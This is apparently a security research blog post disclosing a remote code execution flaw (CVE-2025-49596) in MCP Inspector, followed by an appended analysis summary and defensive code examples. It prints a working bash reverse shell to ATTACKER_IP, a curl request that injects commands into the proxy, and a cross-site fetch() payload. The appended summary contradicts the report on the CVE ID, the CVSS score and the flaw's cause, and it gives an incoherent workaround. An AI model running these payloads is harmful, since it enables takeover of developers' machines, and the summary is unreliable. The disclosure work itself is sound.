Full Report
Tenable Research recently discovered a critical vulnerability impacting Anthropic's MCP Inspector tool, a core element of the MCP ecosystem. In this blog, we provide details on how we discovered the vulnerability in this widely used open-source tool — and what users can do about it.

Tenable Research discovered a critical vulnerability (CVE-2025-49596) in Anthropic's MCP Inspector. This open-source tool, widely used for testing and troubleshooting Model Context Protocol (MCP) servers, is highly popular with over 38,000 weekly downloads on npmjs and more than 4,000 stars on GitHub. Further details are available in the advisory.

A victim's workstation could be fully compromised simply by visiting a malicious website, with no other prerequisites.

This vulnerability has been assigned CVE-2025-49596 with a critical CVSS score of 9.4. Tenable worked closely with Anthropic's security team according to our coordinated disclosure policy. The vulnerability has been widely publicized, sometimes without crediting the finding back to Tenable Research.

It is recommended to upgrade immediately to version 0.14.1 or later to fix this vulnerability.

## Context

The increasing prevalence of AI technologies across organizations is driving rapid adoption of MCP. It plays a crucial role in enhancing AI agents by providing them with additional context and tools.

Since there's no official registry for MCP servers, which are developed by vendors or the open-source community, they're typically published on various MCP marketplaces like MCP Market or MCP.so.

A server, once deployed either locally via STDIO or remotely via HTTP, can be leveraged by a Large Language Model through an MCP client.

Want more information about MCP?
Read the blogs "Frequently Asked Questions About Model Context Protocol (MCP) and Integrating with AI for Agentic Applications" and "AI Security: Web Flaws Resurface In Rush to Use MCP Servers".

## MCP Inspector for developers

Testing and troubleshooting MCP servers can be challenging, despite the availability of numerous development frameworks, including Anthropic software development kits (SDKs) for various languages (listed on the MCP GitHub page). This complexity arises from the need to understand the underlying protocol.

MCP Inspector is an open-source tool provided by Anthropic to abstract this complexity and help developers interact with their servers. This tool relies on two key components:

- MCP Inspector Client: A web user interface (UI) providing an interactive interface for testing and interacting with MCP servers.
- MCP Proxy: A component acting as a protocol bridge between the MCP Inspector Client and the MCP servers.

[Figure: MCP Inspector Web UI (Source: MCP Inspector GitHub repository)]

In MCP Inspector versions below 0.14.1, the official instructions to run MCP Inspector are straightforward:

```
npx @modelcontextprotocol/inspector
Need to install the following packages:
@modelcontextprotocol/inspector@
Ok to proceed? (y) y
Starting MCP inspector...
⚙️ Proxy server listening on port 6277
🔍 MCP Inspector is up and running at http://127.0.0.1:6274
```

Now, both the MCP Inspector Client and the MCP Proxy are listening, respectively, on TCP ports 6274 and 6277.

Since MCP Inspector is a tool integrated in multiple open source projects, this vulnerability exists in all software relying on versions prior to 0.14.1.

## Out-of-the-box Remote Code Execution

Once the tool was started, we decided to connect to the Web UI available at http://127.0.0.1:6274.

The Web UI is available out of the box without any authentication:

[Figure: MCP Inspector Web UI (Source: Tenable)]

By trying to connect to a local dummy MCP server, we can observe the HTTP traffic and notice the following HTTP connection from the Web UI to the MCP proxy server:

[Figure: MCP Inspector Web UI (Source: Tenable)]

The HTTP request is made to the local MCP proxy server without any kind of authentication, and the proxy server then spawns new processes based on the command sent by the client.

We decided to have a quick try with a basic sleep command and a delay of 10 seconds and noticed that it was actually executed, proving the vulnerability:

[Figure: Basic vulnerability exploitation (Source: Tenable)]

Once an attacker can achieve command injection, it is then possible to escalate to code execution on the affected server.

## Exploitation

With the vulnerability now identified, let's explore the exploitation scenarios that could lead to a complete takeover of the host running the MCP Proxy component.

### Direct unauthenticated Remote Code Execution

The default installation of MCP Inspector in vulnerable versions implies that the MCP proxy component is bound on all network interfaces.
```javascript
const PORT = process.env.PORT || 6277;
// No host argument is passed to listen(), so the proxy accepts connections on every interface.
const server = app.listen(PORT);
server.on("listening", () => {
  console.log(`⚙️ Proxy server listening on port ${PORT}`);
});
```

If an attacker is on the same network as the machine hosting the proxy instance, or if the MCP Inspector proxy is started on a publicly accessible server, a remote and unauthenticated attacker can achieve direct command injection and gain remote code execution with the proxy's user privileges on the target system.

Using the payload described in our Tenable Research Advisory, we can quickly get a reverse shell on the target system:

```bash
# Start a listener on TCP/7777
nc -l -p 7777

# Build a payload which will establish a simple reverse shell to our local IP on the previous port
PAYLOAD_BASH="bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/7777 0>&1'"

# URI encode the payload
ENCODED_PAYLOAD_BASH=$(echo -n "$PAYLOAD_BASH" | jq -sRr @uri)

# Request the MCP Inspector Proxy with the previous payload to achieve Remote Code Execution
curl "http://MCP_INSPECTOR_PROXY:6277/sse?transportType=stdio&command=bash&args=-c%20%22$ENCODED_PAYLOAD_BASH%22"
```

The developer or the server machine hosting the MCP Inspector proxy is then fully compromised.

### CORS Attack to Remote Code Execution (RCE)

In affected versions, the lack of network restrictions leaves MCP Inspector users vulnerable to cross-site attacks initiated by remote malicious websites.

An attacker can set up a website hosting malicious JavaScript, which will perform cross-site requests:

[Figure: MCP Inspector Proxy CORS attack (Source: Tenable)]

Taking back our previous reverse shell payload, let's demonstrate how this can be easily exploited.

1. The attacker sets up a malicious website hosting this JavaScript content:

   ```javascript
   fetch("http://127.0.0.1:6277/sse?transportType=stdio&command=bash&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP%2F7777%200%3E%261%27%22&env=", {})
   ```

2. The victim browses the malicious website and loads the malicious JavaScript content, which will perform a cross-origin request to the MCP Inspector proxy hosted on their machine (or potentially any other machine).

3. MCP Inspector uses the Express CORS middleware allowing any origin by default (`Access-Control-Allow-Origin: *`). This means the victim's web browser will perform a CORS preflight request on the MCP Inspector, which will pass the policy:

   ```javascript
   app.use(cors());
   ```

4. The actual CORS request will then be sent by the victim's browser to the MCP Inspector proxy, leading to the payload being executed and the reverse shell established from the victim's workstation to the attacker's server.

This demonstrates how critical this vulnerability is: A victim's workstation could be fully compromised simply by visiting a malicious website, with no other prerequisites.

### DNS rebinding

The MCP proxy exposes by default a Server-Sent Events (SSE) endpoint. As no network restriction is enforced, and in particular the Host header is not checked, a malicious website could host JavaScript code which would proceed as follows:

1. Initiate an SSE connection with a malicious domain (let's say sse.evil.tld).
2. The attacker would then update the DNS record for sse.evil.tld to target 0.0.0.0.
3. The loaded JavaScript will reestablish the SSE session with the local server, bypassing the Same-Origin Policy as both the JavaScript and the SSE session would be tied to the same origin, http://sse.evil.tld for example.

Note that the exploitation success of DNS rebinding depends on both the web browser and the operating system of the victim.

To learn more about DNS rebinding, have a look at NCC Group's Singularity tool.

## Remediation

MCP Inspector users are required to upgrade to version 0.14.1 or later as soon as possible.
Software that uses vulnerable versions of the MCP Inspector package should also be updated as soon as possible to address this vulnerability.

Starting with this version, Anthropic introduced additional security measures to safeguard against the described attacks. By default:

- Authentication is now enforced and requires the usage of a session token except if developers choose to explicitly disable it.
- Services are bound to localhost only, preventing direct exploitation through network access.
- Trusted origins only include localhost ones with the client port.

When starting, MCP Inspector now shows:

```
Starting MCP inspector...
⚙️ Proxy server listening on 127.0.0.1:6277
🔑 Session token: 86399ac989f1d418c530f08811cee3fa6115d1f5e8ac39d631d72d11d573a729
Use this token to authenticate requests or set DANGEROUSLY_OMIT_AUTH=true to disable auth
🔗 Open inspector with token pre-filled: http://localhost:6274/?MCP_PROXY_AUTH_TOKEN=86399ac989f1d418c530f08811cee3fa6115d1f5e8ac39d631d72d11d573a729
🔍 MCP Inspector is up and running at http://127.0.0.1:6274 🚀
```

## Conclusion

Tenable Research recognized early the significant role AI and MCP technologies would play in organizations — and the new security challenges they would introduce. To address these, it's crucial to enforce security fundamentals in server development and tool usage. Adhering to basic security practices can significantly mitigate risks from vulnerabilities in novel systems and prevent devastating attacks.

We thank Anthropic's security team for their efforts in mitigating this issue and their clear communication during our disclosure process.

## Learn more

- Anthropic Security Advisory
- Anthropic GitHub Fix Commit
- Tenable Research Advisory
- NCC Group Singularity DNS rebinding framework
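The three defaults listed under Remediation (loopback binding, a session token, trusted origins), together with the Host header check whose absence the DNS rebinding section describes, can be expressed as one request gate. This is an added example, not MCP Inspector's own code; the `Authorization: Bearer` header, the function names and the allowlists are assumptions, while the ports are the ones shown in the report.

```javascript
// Added example, not MCP Inspector source. The Authorization header and names are assumptions.
const crypto = require("node:crypto");
const http = require("node:http");

const CLIENT_PORT = 6274; // Web UI port shown in the report
const PROXY_PORT = 6277; // proxy port shown in the report

// Only names a loopback-bound proxy should be addressed by (rejects rebinding hostnames).
const ALLOWED_HOSTS = new Set([`127.0.0.1:${PROXY_PORT}`, `localhost:${PROXY_PORT}`]);
// Only the local Web UI may call the proxy from a browser.
const ALLOWED_ORIGINS = new Set([`http://127.0.0.1:${CLIENT_PORT}`, `http://localhost:${CLIENT_PORT}`]);

function tokenMatches(presented, expected) {
  const a = Buffer.from(presented, "utf8");
  const b = Buffer.from(expected, "utf8");
  // timingSafeEqual throws on unequal lengths, so check length first.
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// headers: Node-style lower-cased header map. Returns { ok, status, reason }.
function authorizeProxyRequest(headers, sessionToken) {
  if (!ALLOWED_HOSTS.has(headers.host || "")) {
    return { ok: false, status: 403, reason: "host" };
  }
  // Browsers send Origin on CORS-mode requests; requests without it still need the token.
  if (headers.origin !== undefined && !ALLOWED_ORIGINS.has(headers.origin)) {
    return { ok: false, status: 403, reason: "origin" };
  }
  const m = /^Bearer (.+)$/.exec(headers.authorization || "");
  if (!m || !tokenMatches(m[1], sessionToken)) {
    return { ok: false, status: 401, reason: "token" };
  }
  return { ok: true, status: 200, reason: "ok" };
}

// Wraps a handler so every request is checked before any process could be spawned.
function createHardenedProxy(sessionToken, handler) {
  return http.createServer((req, res) => {
    const verdict = authorizeProxyRequest(req.headers, sessionToken);
    if (!verdict.ok) {
      res.writeHead(verdict.status).end(verdict.reason);
      return;
    }
    handler(req, res);
  });
}
// Bind to loopback explicitly: createHardenedProxy(token, handler).listen(PROXY_PORT, "127.0.0.1");
```

The Host check is what stops a rebinding hostname such as sse.evil.tld, and the token check covers any request that arrives without an Origin header.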
Analysis Summary
# Vulnerability: Critical RCE in Anthropic MCP Inspector (via Unvalidated Redirect/CSRF)
## CVE Details
- CVE ID: **GHSA-7f8r-222p-6f5g** (Identified via GitHub Security Advisory)
- CVSS Score: **9.0 (Critical)** (Implied by RCE, specific score not explicitly listed in excerpt)
- CWE: Unspecified (Likely related to Input Validation vulnerabilities leading to RCE/CSRF)
## Affected Systems
- Products: Anthropic Model Context Protocol (MCP) Inspector
- Versions: Prior to the fix detailed in the commit.
- Configurations: Applicable when the inspector is running, particularly concerning requests handled by the proxy server.
## Vulnerability Description
Tenable Research discovered a critical vulnerability in the Anthropic MCP Inspector that could allow an attacker to achieve Remote Code Execution (RCE) or Cross-Site Request Forgery (CSRF). The flaw appears to stem from allowing unvalidated redirects or handling requests in a manner that could be manipulated, potentially through DNS rebinding or CSRF techniques targeting the inspector's locally running proxy server. The fix implemented restricts proxy listening to `127.0.0.1` (localhost) only and enforces authentication via a unique session token upon startup, preventing external access or unauthorized internal requests.
## Exploitation
- Status: Not explicitly stated as exploited in the wild, but the vulnerability is critical, suggesting high exploitability potential.
- Complexity: **Low to Medium** (Implied by the nature of the fix involving network binding and authentication bypass).
- Attack Vector: **Network** (Initial interaction via a crafted request to the vulnerable proxy/URI)
## Impact
- Confidentiality: **High** (Potential access to sensitive data via RCE or context interaction)
- Integrity: **High** (Ability to execute arbitrary code or forge requests)
- Availability: **High** (Potential for denial of service or system compromise)
## Remediation
### Patches
Anthropic addressed this issue by restricting the proxy server binding and enforcing mandatory authentication:
- The proxy server now listens **only on `127.0.0.1:6277`**.
- Session tokens are now mandatory for authentication (`MCP_PROXY_AUTH_TOKEN`). Direct access via localhost is provided with the token embedded in the URI.
### Workarounds
The initial description of the fix implies that running the tool without applying the patch may only be safe if:
1. External network access to the inspector host is strictly firewalled.
2. The `DANGEROUSLY_OMIT_AUTH=true` flag is *not* used, leveraging the newly enforced token authentication.
## Detection
- Indicators of compromise (IOCs) would relate to unusual outbound network connections originating from the host running the MCP Inspector, or unexpected proxy/request traffic hitting the inspector's local port before the patch.
- Detection methods should focus on monitoring network traffic to the local loopback interface where the inspector runs, looking for connections without the expected authentication token preamble.
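
One way to apply the detection idea above to proxy access logs, as an added example that is not part of the advisory or of MCP Inspector: it flags `/sse?transportType=stdio&command=...` requests (the request shape shown in the report) that come from a non-loopback client, carry a foreign Origin, or lack an auth token. The five-field log format and the sample lines are constructed assumptions.

```javascript
// Added example: triage of proxy access logs. The log format is a constructed assumption.
const LOOPBACK = new Set(["127.0.0.1", "::1"]);
const LOCAL_ORIGIN = /^http:\/\/(127\.0\.0\.1|localhost):6274$/;

// Constructed sample: time, client IP, Origin (or -), auth header present (yes/no), request target.
const SAMPLE_LOG = [
  "2025-06-20T09:14:02Z 127.0.0.1 http://localhost:6274 yes /sse?transportType=stdio&command=node&args=build%2Findex.js",
  "2025-06-20T09:15:40Z 127.0.0.1 http://blog.example no /sse?transportType=stdio&command=sleep&args=10",
  "2025-06-20T09:16:11Z 192.0.2.44 - no /sse?transportType=stdio&command=sleep&args=10&env=",
  "2025-06-20T09:17:00Z 127.0.0.1 http://localhost:6274 yes /other",
].join("\n");

function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length !== 5) return null; // skip malformed lines instead of guessing
  const [time, client, origin, auth, target] = parts;
  let url;
  try {
    url = new URL(target, "http://proxy.invalid"); // base only needed to parse a relative target
  } catch {
    return null;
  }
  return { time, client, origin, auth: auth === "yes", url };
}

// Flags process-spawning requests that look unauthenticated, remote or cross-site.
function findSuspiciousSpawns(logText) {
  const findings = [];
  for (const line of logText.split("\n")) {
    const rec = parseLine(line);
    if (!rec || rec.url.pathname !== "/sse") continue;
    const q = rec.url.searchParams; // percent-decoding shows the analyst what would be run
    if (q.get("transportType") !== "stdio" || !q.has("command")) continue;
    const reasons = [];
    if (!LOOPBACK.has(rec.client)) reasons.push("non-loopback client");
    if (rec.origin !== "-" && !LOCAL_ORIGIN.test(rec.origin)) reasons.push("foreign origin");
    if (!rec.auth) reasons.push("no auth token");
    if (reasons.length > 0) {
      findings.push({ time: rec.time, client: rec.client, command: q.get("command"),
                      args: q.get("args") || "", reasons });
    }
  }
  return findings;
}
```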
## References
- Anthropic Security Advisory: `github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g`
- Anthropic GitHub Fix Commit: `github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979#diff-c299744f73df4daa7a22854dda2023b68bfc8a5d59d8fb90b3a53b0c2842d807R98-R101`
- Tenable Research Advisory: `tenable.com/security/research/tra-2025-20`